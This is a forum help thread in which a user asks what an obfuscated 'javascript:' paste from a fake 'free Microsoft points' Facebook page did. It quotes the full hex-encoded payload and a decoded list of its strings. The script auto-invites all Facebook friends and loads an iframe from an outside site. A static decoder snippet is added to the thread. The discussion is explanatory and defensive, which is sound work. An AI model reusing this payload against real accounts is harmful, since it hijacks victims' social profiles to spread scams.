  1. #1
    New to the CF scene
    Join Date
    Jul 2010
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Was I javascript hacked?

    I have a problem that hopefully someone here can help me with. Since I don't know any JavaScript, I thought I would check here. Through a "get free Microsoft points" Facebook page I was suggested, I tried to copy and paste the following code into my browser's address bar. It appeared that nothing happened, but my friend who knows a little JavaScript told me that the code is nasty stuff that tried to access my computer. I really have two major questions.

    1. What if anything did me entering the code do to my computer?

    2. How do I fix it?

    Before I give the code, a little bit about my system. I tried it with both Firefox and IE. I am on Windows Vista 32-bit. I have Trend Micro antivirus and ran it; nothing suspicious was seen.

    Code:
    javascript:var _0x8a13=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
    "\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79" ,"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\ x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22 \x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73 \x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61 \x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x32\x31\x32\x31\x33\x35\x33\x37\x39\x32\x34\x32\x35\x38\x22\x20 \x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74 \x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75 \x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61
    \x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73 ","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\ x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\ x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\
    x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68 \x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\ x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x64\x72\x65\ x61\x6D\x74\x72\x69\x63\x6B\x2E\x6E\x65\x74\x2F\x6D\x73\x70\x2E\x68\x74\x6D\x6C\x22\
    x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x38\x32\x30\x70\x78\x3B\ x20\x68\x65\x69\x67\x68\x74\x3A\x20\x36\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\ x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\ x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0x8a13[0],_0x8a13[1]
    ,_0x8a13[2],_0x8a13[3],_0x8a13[4],_0x8a13[5],_0x8a13[6],_0x8a13[7],_0x8a13[8],_0x8a13[9] ,_0x8a13[10],_0x8a13[11],_0x8a13[12],_0x8a13[13]]; void (document[variables[2]] (variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]) ;var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); 
    void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0x8a13[14]);
    Thanks for everyone's help.

  • #2
    Regular Coder
    Join Date
    Apr 2010
    Posts
    163
    Thanks
    3
    Thanked 25 Times in 25 Posts
    You weren't hacked; JS has no effect on anything outside of the page that called it.
    The code was obfuscated to make it harder to read, but if you put javascript:alert("\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C") in your URL bar you will see innerHTML. You can do this for the rest of the code to see what it actually said. The code didn't do anything because there is a syntax error in it.

  • #3
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    26,598
    Thanks
    80
    Thanked 4,498 Times in 4,462 Posts
    I don't think it's a virus, per se.

    Just a way to conceal what they are doing to get you to buy into their stuff.

    FWIW, the "hidden strings" in there (the ones that are encoded as "\x69\x6E\x6E\x65\x72..." etc.) are actually these strings:
    Code:
    innerHTML
    app4949752878_body
    getElementById
    <a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=121213537924258" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>
    suggest
    MouseEvents
    createEvent
    click
    initEvent
    dispatchEvent
    select_all
    sgm_invite_form
    /ajax/social_gsubmitDialog
    <iframe src="http://www.dreamtrick.net/msp.html" style="width: 820px; height: 600px;" frameborder=0 scrolling="no"></iframe>
    Hmmmm...maybe I'm wrong.

    It looks like it waits 4 seconds and then does a "select_all" (that is, grabs everything on the page) and then, one second later, submits the stuff it just selected to some place.

    So I *THINK* it is trying to grab all the contents of the page it is installed on and send it off somewhere so that somebody can try to get whatever data they can find there for their own purposes.

    I don't see any way it got anything "off your computer" other than whatever was on the page you were then viewing. If the page you were viewing had your username and password on it, then maybe it swiped them. So go change your password.
    An optimist sees the glass as half full.
    A pessimist sees the glass as half empty.
    A realist drinks it no matter how much there is.
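
Added example, not part of any post in this thread: a static decoder for this style of obfuscation, which reads the `\xNN` string table as text and substitutes the array lookups without ever executing the pasted code. `SAMPLE` is a constructed, abridged input built from four of the strings listed above, and the function names are illustrative.

```javascript
// Static decoder: treats the pasted text as data and never evaluates it.
// SAMPLE is constructed and abridged: four strings from the thread and two calls,
// with the stray spaces that forum line-wrapping leaves inside the escapes.
const SAMPLE = String.raw`javascript:var _0x8a13=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64" ,"\x73\x75\x67\x67\ x65\x73\x74",
"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C "];var variables=[_0x8a13[0],_0x8a13[1],
_0x8a13[2],_0x8a13[3]];var ss=document[variables[1]](variables[2]);
void setTimeout(function (){fs[variables[3]]();} ,4000);`;

// Assumption: the payload hex-escapes every character (a real space is \x20),
// so literal whitespace inside a string literal is wrapping debris and is dropped.
function decodeLiteral(body) {
  return body
    .replace(/\s+/g, "")
    .replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Locate `var <name>=[ ... ];` and return the match (contents in group 1).
function findArray(source, name) {
  return source.match(new RegExp("var\\s+" + name + "\\s*=\\s*\\[([\\s\\S]*?)\\]\\s*;"));
}

function deobfuscate(source, table = "_0x8a13", alias = "variables") {
  const ref = (name) => new RegExp(name + "\\s*\\[\\s*(\\d+)\\s*\\]", "g");
  const tableDecl = findArray(source, table);
  const strings = tableDecl
    ? [...tableDecl[1].matchAll(/"((?:[^"\\]|\\[\s\S])*)"/g)].map((m) => decodeLiteral(m[1]))
    : [];
  // The alias array just re-indexes the string table; resolve it to decoded strings.
  const aliasDecl = findArray(source, alias);
  const aliased = aliasDecl
    ? [...aliasDecl[1].matchAll(ref(table))].map((m) => strings[+m[1]])
    : [];
  // Substitute every lookup in the statements that follow the declarations.
  const body = aliasDecl ? source.slice(aliasDecl.index + aliasDecl[0].length) : source;
  const readable = body
    .replace(ref(alias), (_, i) => JSON.stringify(aliased[+i] ?? "<missing>"))
    .replace(ref(table), (_, i) => JSON.stringify(strings[+i] ?? "<missing>"))
    .replace(/\s+/g, " ")
    .trim();
  return { strings, readable };
}

console.log(deobfuscate(SAMPLE).readable);
```

Run under Node.js, it prints the two statements with property names such as "getElementById" and "select_all" in place of the indexed lookups.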

  • #4
    Supreme Master coder! Old Pedant's Avatar
    Join Date
    Feb 2009
    Posts
    26,598
    Thanks
    80
    Thanked 4,498 Times in 4,462 Posts
    Quote: Originally posted by gizmo1650
    The code didn't do anything because there is a syntax error in it.
    ??? I didn't see a syntax error. What did you see?

  • #5
    New to the CF scene
    Join Date
    Jul 2010
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Thumbs up

    Thanks, Old Pedant. What happened to the guy who actually ran that JavaScript is exactly what you described the JavaScript does. He said that it selected all the options on the page and then automatically suggested that page to all of his Facebook friends.

    Thank you for the quick response! I can stop worrying so much now about it.

  • #6
    Supreme Master coder! _Aerospace_Eng_'s Avatar
    Join Date
    Dec 2004
    Location
    In a place far, far away...
    Posts
    19,291
    Thanks
    2
    Thanked 1,043 Times in 1,019 Posts
    Key words "a little". Your antivirus and firewalls would be throwing up alerts. If the code wasn't put there by you then it's possible someone injected it in some way on the server.
    ||||If you are getting paid to do a job, don't ask for help on it!||||

  • #7
    Supreme Master coder! Philip M's Avatar
    Join Date
    Jun 2002
    Location
    London, England
    Posts
    18,159
    Thanks
    203
    Thanked 2,548 Times in 2,526 Posts
    Quote: Originally posted by Keychain1234
    Since I don't know any JavaScript, I thought I would check here. Through a "get free Microsoft points" Facebook page I was suggested, I tried to copy and paste the following code into my browser's address bar.
    Alas, there is one born every minute. I hope that you have learned something from this - never, ever do such a thing. You seem to be a ripe target for phishing and you were lucky that you did not introduce a virus into your machine. The Javascript code could have invited you to click on a link to get "Free Microsoft Points", see nude girls, extend your virile member or whatever.

  • #8
    Senior Coder Rowsdower!'s Avatar
    Join Date
    Oct 2008
    Location
    Some say it's everything.
    Posts
    2,027
    Thanks
    5
    Thanked 397 Times in 390 Posts
    Quote: Originally posted by Philip M
    ...The Javascript code could have invited you to click on a link to get "Free Microsoft Points", see nude girls, extend your virile member or whatever.
    Call me immature, but that made me chuckle.
    The object of opening the mind, as of opening the mouth, is to shut it again on something solid. –G.K. Chesterton
    See Mediocrity in its Infancy
    It's usually a good idea to start out with this at the VERY TOP of your CSS: * {border:0;margin:0;padding:0;}
    Seek and you shall find... basically:
    validate your markup | view your page cross-browser/cross-platform | free web tutorials | free hosting

  • #9
    Regular Coder
    Join Date
    Jul 2010
    Location
    St George, UT
    Posts
    138
    Thanks
    6
    Thanked 17 Times in 17 Posts
    Quote: Originally posted by Rowsdower!
    Call me immature, but that made me chuckle.
    Pretty immature if you ask me. What are you, 4?


